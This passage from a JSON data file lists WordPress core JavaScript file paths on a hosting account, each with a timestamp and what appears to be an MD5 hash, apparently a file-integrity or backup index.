":\"4237af4931ba3003048f8eb5b98364c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/license.txt\":{\"d\":1494212566,\"h\":\"6f9589e0c8df783acd1760d203bafffa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/wp-tinymce.js.gz\":{\"d\":1542794328,\"h\":\"ae0291326626c0f608f620ac31dd6c6e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/wp-tinymce.php\":{\"d\":1420244842,\"h\":\"8a620ab81dc7307f7072b1d312924876\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tinymce\\/tinymce.min.js\":{\"d\":1531812866,\"h\":\"e0cc75e46e7be9cda3c4da2a12e6e2f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill.js\":{\"d\":1541984930,\"h\":\"34800de78944cc6cf21ac3c61cd7df03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/lodash.min.js\":{\"d\":1539920206,\"h\":\"62acde2a2687c63954bee264a1a2f86d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/lodash.js\":{\"d\":1540372734,\"h\":\"07ec8c63dfd89bcdb33f8bd14f4f8db8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/react-dom.min.js\":{\"d\":1542318056,\"h\":\"1c4cddde3c73b3e706b6ad620582daf7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/react.min.js\":{\"d\":1542318056,\"h\":\"ef752361755a318f70b5a3ae9cb2ed3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill-formdata.min.js\":{\"d\":1539920206,\"h\":\"7f233f44898ccd1f7284963110804e5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/moment.min.js\":{\"d\":1539920206,\"h\":\"8999b8b5d07e9c6077ac5ac6bc942968\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill-formdata.js\":{\"d\":1540372734,\"h\":\"2265a1bd3059b1a457381c86d5dd9052\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill-node-contains.js\":{\"d\":1540372734,\"h\":\"8e8cdd77e6e80407255b55c41dc533a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill-element-closest.min.js\":{\"d\":1539920206,\"h\":\"89a4e64830ce633b60f1e4060faa5726\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/moment.js\":{\"d\":1540372734,\"h\":\"6722aa945b6577eda74330383105557f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill-fetch.min.js\":{\"d\":1539920206,\"h\":\"bf3a6ad4463d6f0d2bc861cbcb05c799\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill.min.js\":{\"d\":1541980678,\"h\":\"6926951583064a4532a7819f624c7756\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/react.js\":{\"d\":1542318056,\"h\":\"47f592e79ad9ce36525bec84a9ce239f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill-node-contains.min.js\":{\"d\":1539920206,\"h\":\"b32d5cea64b4fd156f47c0ec0a9d8532\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill-element-closest.js\":{\"d\":1540372734,\"h\":\"3c6accf0039920bf3c59748c23f4261d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/wp-polyfill-fetch.js\":{\"d\":1540372734,\"h\":\"456c02ee2a496580a24e5aee614ba9b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/vendor\\/react-dom.js\":{\"d\":1542318056,\"h\":\"c6ef74c7ec0704ff4cad3b5ec7bfa055\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/list-reusable-blocks.min.js\":{\"d\":1543562992,\"h\":\"9e5728386c1eaa1c6eb5a23eeb9ff0c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/redux-routine.min.js\":{\"d\":1543562992,\"h\":\"9edcaa09dfed88e54fbca308bfd5bd30\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/core-data.js\":{\"d\":1547081519,\"h\":\"d9d282309deba0fae8e0d9e1390bb2a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/rich-text.min.js\":{\"d\":1545267178,\"h\":\"2b08233d7239ada8cf8b27d302a11a5c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/deprecated.min.js\":{\"d\":1542803998,\"h\":\"9d288327c3cc35f46ee387ac35ce33d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/a11y.js\":{\"d\":1542847370,\"h\":\"8227a618a371014e3b3eb4c23607a25f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/dom-ready.js\":{\"d\":1542847370,\"h\":\"9cdf2bc4e52829d46923c46a0c51b3d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/hooks.js\":{\"d\":1547081519,\"h\":\"d1495ca6445d4be01ea2c604ffad2c91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/blocks.min.js\":{\"d\":1547081519,\"h\":\"f39f38665ac6b784630b3f652375580b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/is-shallow-equal.min.js\":{\"d\":1542318056,\"h\":\"0ddf6ee2668f5c4bd3c1d2d6cab397b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/data.js\":{\"d\":1547081525,\"h\":\"8a70f593b4e1c7255d1477a5b943de61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/notices.js\":{\"d\":1542847370,\"h\":\"a97eec74d9c0c50bf12be932ba1cc303\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/date.min.js\":{\"d\":1545267178,\"h\":\"5d459e25af93fd190cbe45fe0393622a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/format-library.js\":{\"d\":1545267182,\"h\":\"590d64772c4414fbb688f129a6c9e9af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/block-library.js\":{\"d\":1547081525,\"h\":\"f8dd79f25b1b88b0dac790416138a00a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/editor.min.js\":{\"d\":1547081529,\"h\":\"6191d588e62256e25a4e735c318b5ab0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/wordcount.js\":{\"d\":1542847370,\"h\":\"6cbedf2a939d33d895dca7b7a41ce749\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/url.min.js\":{\"d\":1547081529,\"h\":\"4d6c78efb41747c864b4dc24c5c7f939\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/api-fetch.min.js\":{\"d\":1542803998,\"h\":\"da6b492eec5e352193be733652fb3209\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/element.js\":{\"d\":1545267185,\"h\":\"fe88f0268727624b18aad39156e0fcfa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/redux-routine.js\":{\"d\":1543562992,\"h\":\"a6f2946ff5131fb4149a5e31c1ef1620\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/rich-text.js\":{\"d\":1545267185,\"h\":\"56efbae730dff0e4ebe544f04c1bcc61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/html-entities.js\":{\"d\":1542847370,\"h\":\"5653e616ff072597049a986e94d1893d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/token-list.js\":{\"d\":1542847370,\"h\":\"0d97e2a44480fb98f1b04861ae5afc6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/keycodes.js\":{\"d\":1545267185,\"h\":\"d398b8fab3582fd237c150f65310747e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/deprecated.js\":{\"d\":1542847370,\"h\":\"98bad6a83bd5da218b2d35691f497566\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/api-fetch.js\":{\"d\":1542847370,\"h\":\"f09de7c7aeb73fa3f8a1e53e6ff4b305\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/url.js\":{\"d\":1547081529,\"h\":\"026d66222af818d4aab9a2059165b064\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/shortcode.js\":{\"d\":1542847370,\"h\":\"a78dedde748a70dc816381eefe608b72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/viewport.min.js\":{\"d\":1547081529,\"h\":\"d7932636c66dd528dc7fd98caa7a607e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/list-reusable-blocks.js\":{\"d\":1543562992,\"h\":\"4d9fa198a4229643fa7b513d81d16bd5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/notices.min.js\":{\"d\":1542803998,\"h\":\"17eeb174de4dc2cbbab3f4df5033d860\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/blob.min.js\":{\"d\":1542803998,\"h\":\"f8b9570fbad012216e0ad8a1ea84187e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/keycodes.min.js\":{\"d\":1545267185,\"h\":\"8984f96477ccd220c22d2798088414d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/blob.js\":{\"d\":1542847370,\"h\":\"e6c27ec1d6668699f712c56b4a819f4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/format-library.min.js\":{\"d\":1545267185,\"h\":\"dee80998f8a3f592d7bf32754e8e3017\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/date.js\":{\"d\":1545267185,\"h\":\"95a892f98c25fe1f4b577bd187db7dbf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/edit-post.min.js\":{\"d\":1547081529,\"h\":\"7423dbf596bd505ff600ab11c69d15c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/html-entities.min.js\":{\"d\":1541000702,\"h\":\"6bc5679d9554f610fa802a700e4d2bb0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/data.min.js\":{\"d\":1547081529,\"h\":\"07c02f5b612470483def32a975cd96cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/block-serialization-default-parser.min.js\":{\"d\":1543602526,\"h\":\"1d585ce73cc724afa36727542a43ac97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/block-serialization-default-parser.js\":{\"d\":1543602526,\"h\":\"7d8ad191246e8e6dea0203f73f8cc061\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/escape-html.js\":{\"d\":1542847370,\"h\":\"3d16ddce4596d2becd5a1600a222ad0f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/compose.min.js\":{\"d\":1543562992,\"h\":\"84a24df5fd7511a645e0cc57c571a25e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/i18n.min.js\":{\"d\":1542803998,\"h\":\"3762e49b94ff5c920b2134988f7e32dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/dom.min.js\":{\"d\":1547081529,\"h\":\"a2f3f8a8d0643c3fef95f4c59b78472a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/components.js\":{\"d\":1547081529,\"h\":\"51965929307297ed0ef5e9ad07709dfa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/hooks.min.js\":{\"d\":1547081529,\"h\":\"372901e50eb2d47eb24cb57a62aaa7f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/token-list.min.js\":{\"d\":1542803998,\"h\":\"aa95d2cbba56cee9e4c478aae1b495c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/components.min.js\":{\"d\":1547081529,\"h\":\"84cdfb957f060ba494e4a5178672c106\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/autop.min.js\":{\"d\":1542803998,\"h\":\"a207f32426009dc93b26585ed42aee17\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/dom-ready.min.js\":{\"d\":1542803998,\"h\":\"b5c1330c5b03e42ea6bcfa6df3fac8c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/i18n.js\":{\"d\":1542847370,\"h\":\"53267e22d19e925551ff2f6eecb60c07\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/annotations.min.js\":{\"d\":1545267187,\"h\":\"16dd6bf7592ecc3334fcda83d2b9a7a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/annotations.js\":{\"d\":1545267187,\"h\":\"07e8500c949b1e53ed07759160193182\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/plugins.min.js\":{\"d\":1543562992,\"h\":\"8b7c6306e6af8cc0a9c0976463e72291\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/element.min.js\":{\"d\":1545267187,\"h\":\"058ac8898dad07d85527a9e2983620d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/a11y.min.js\":{\"d\":1542803998,\"h\":\"cb439a67a2dbdefec09fec7b57ef64df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/is-shallow-equal.js\":{\"d\":1542847370,\"h\":\"6f7824784191e6d2ce34292fd3b000af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/wordcount.min.js\":{\"d\":1542318056,\"h\":\"baee04dfe8fe19a1395c4764b3090e94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/viewport.js\":{\"d\":1547081529,\"h\":\"ea43d42792f43b764449b2618693c069\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/plugins.js\":{\"d\":1543562992,\"h\":\"cf2c44c23fcccdac64b0f533764e7a57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/compose.js\":{\"d\":1543562992,\"h\":\"d8938753827f30dbd34f1383cd339fff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/escape-html.min.js\":{\"d\":1541000702,\"h\":\"57fb61bedd534ef3dd8c47e40db28211\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/editor.js\":{\"d\":1547081529,\"h\":\"dc9f3b6295f11d544425284077dbe77f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/nux.min.js\":{\"d\":1545267188,\"h\":\"80332405c607e928fa6a16de140aa4c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/edit-post.js\":{\"d\":1547081531,\"h\":\"3a8f886d748dd1bc6390f29b8b1cc909\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/core-data.min.js\":{\"d\":1547081531,\"h\":\"73143e8195b1151c70875f1f7717e778\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/dom.js\":{\"d\":1547081533,\"h\":\"0da7a6c0a8988d47b4cbc451ed68e712\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/shortcode.min.js\":{\"d\":1542803998,\"h\":\"40ed11fa6412995d2b8ec4668c512957\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/nux.js\":{\"d\":1545267191,\"h\":\"4da60c791df64a2f136d684b8c6a094c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/autop.js\":{\"d\":1542847370,\"h\":\"7ee01d53b8d7ab46463b64f64d504520\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/block-library.min.js\":{\"d\":1547081533,\"h\":\"3d87ea3fd4d155e3f8d0e1e96cea6256\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/dist\\/blocks.js\":{\"d\":1547081533,\"h\":\"e66a65abca2667e9478f1298b964be52\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-slide.min.js\":{\"d\":1539135686,\"h\":\"fa23475fb01c8f4d56da98ca0c1179b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-pulsate.min.js\":{\"d\":1539135686,\"h\":\"bf836f20530440115a2a8487ca7021c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/progressbar.min.js\":{\"d\":1539135686,\"h\":\"b94d71da54d9b4413ffa4c7d792269c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-transfer.min.js\":{\"d\":1539135686,\"h\":\"07e5b0dea800777dd2108788b56ef90b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect.min.js\":{\"d\":1539135686,\"h\":\"3f7161cf139d5a2c5e6d34e1c0026f9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-highlight.min.js\":{\"d\":1539135686,\"h\":\"95e8ebe62adf187fb4c3b84eb5bef821\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/selectmenu.min.js\":{\"d\":1539135686,\"h\":\"cb7db4cbaa328e395a680c78692236f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-bounce.min.js\":{\"d\":1539135686,\"h\":\"4bc4c97924bea4bf7b04d7b46ff4f64c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-fold.min.js\":{\"d\":1539135686,\"h\":\"8d365ec1b3a7ee82f93c9afd441e456c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/mouse.min.js\":{\"d\":1539135686,\"h\":\"82835a8960ddd73020389dbfa45c39a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/tabs.min.js\":{\"d\":1539135686,\"h\":\"5330c83425ab1b8f67ce63f741427adb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/spinner.min.js\":{\"d\":1539135686,\"h\":\"3acf32da612bf35221c09394856591dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-explode.min.js\":{\"d\":1539135686,\"h\":\"c0df625cca418cfd803a11514a3dd1e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-blind.min.js\":{\"d\":1539135686,\"h\":\"addbe09f173c4f1bd86d41ac5f3b4f4c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/button.min.js\":{\"d\":1539135686,\"h\":\"2ce99e1ed08df351e6a58eb4b6bcbfa9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-puff.min.js\":{\"d\":1539135686,\"h\":\"fe496d6c9d63bc47854084c8b3fc20d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-clip.min.js\":{\"d\":1539135686,\"h\":\"c7939457e8ab231b951713475a056173\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/draggable.min.js\":{\"d\":1539135686,\"h\":\"443c277789baf69c490019d59c1b36ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-shake.min.js\":{\"d\":1539135686,\"h\":\"260cbafcbcedc23348a371cb80083112\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-fade.min.js\":{\"d\":1539135686,\"h\":\"9f6fd64f4f5ff5893b7b72a235246d0c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/slider.min.js\":{\"d\":1539135686,\"h\":\"9408efe2ce5a6b4364f34cbda02f814b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/sortable.min.js\":{\"d\":1539135686,\"h\":\"2896e90cc17e9abc160ed96bb86b07e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/accordion.min.js\":{\"d\":1539135686,\"h\":\"334c2ffb0b086ffc0f6f192ea120f3c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/menu.min.js\":{\"d\":1539135686,\"h\":\"c91cfff50715441295fe7463bb5d3894\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/tooltip.min.js\":{\"d\":1539135686,\"h\":\"443f68690d84eee42cf3019071340730\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-size.min.js\":{\"d\":1539135686,\"h\":\"b00e3dfd6eebccd5ea9aeb3293d85a25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/resizable.min.js\":{\"d\":1539135686,\"h\":\"a5001032177c492cf0ff7c86bc01169f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/widget.min.js\":{\"d\":1539135686,\"h\":\"8cf7f36bbd79bc0664b6113f7a7837fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-drop.min.js\":{\"d\":1539135686,\"h\":\"57fe560887cac7a5b2598188463290e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/core.min.js\":{\"d\":1539135686,\"h\":\"9ce4e157448487d4efe0ca538f656a71\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/autocomplete.min.js\":{\"d\":1539135686,\"h\":\"d0ff3eba6258651773c3a5cc909efde6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/effect-scale.min.js\":{\"d\":1539135686,\"h\":\"d57d0830652c29c3e0e301b02b6db754\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/position.min.js\":{\"d\":1539135686,\"h\":\"1c4a13edec1958817e83433aeaa42f62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/datepicker.min.js\":{\"d\":1539135686,\"h\":\"cfb63dc18fde53fef4d4fdc19ddfdcd6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/selectable.min.js\":{\"d\":1539135686,\"h\":\"b632add191ecae92e6a7b6b97212a640\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/droppable.min.js\":{\"d\":1539135686,\"h\":\"debf5224c4162887d1a6e3198ed953d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/ui\\/dialog.min.js\":{\"d\":1539135686,\"h\":\"3ecd9590aac778514f4e69975ed91a62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.color.min.js\":{\"d\":1365605996,\"h\":\"ff2db8dbf145ce47f31781eef33e764a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.hotkeys.js\":{\"d\":1388612474,\"h\":\"e29483a8ca26a0dd8b0d1146c6b0a6e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery-migrate.js\":{\"d\":1463715688,\"h\":\"6c57b762589f13ea5b3579ca5e6c369b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/suggest.min.js\":{\"d\":1452696748,\"h\":\"7311075c2b411b299c94e36e2e3bab89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.masonry.min.js\":{\"d\":1471537530,\"h\":\"cd0eb3406096ff80266e7c9d7d419186\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.hotkeys.min.js\":{\"d\":1345671258,\"h\":\"e353217d4555ab5c62b367be6889813d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.serialize-object.js\":{\"d\":1295555978,\"h\":\"d15c29a18d9ffa8b9b4ae86c3c0cfa22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery-migrate.min.js\":{\"d\":1463715688,\"h\":\"7121994eec5320fbe6586463bf9651c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.js\":{\"d\":1463985030,\"h\":\"8610f03fe77640dee8c4cc924e060f12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.table-hotkeys.min.js\":{\"d\":1345671258,\"h\":\"e56f81676f199db7bf937e69a64909fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/suggest.js\":{\"d\":1452696748,\"h\":\"3a2474569145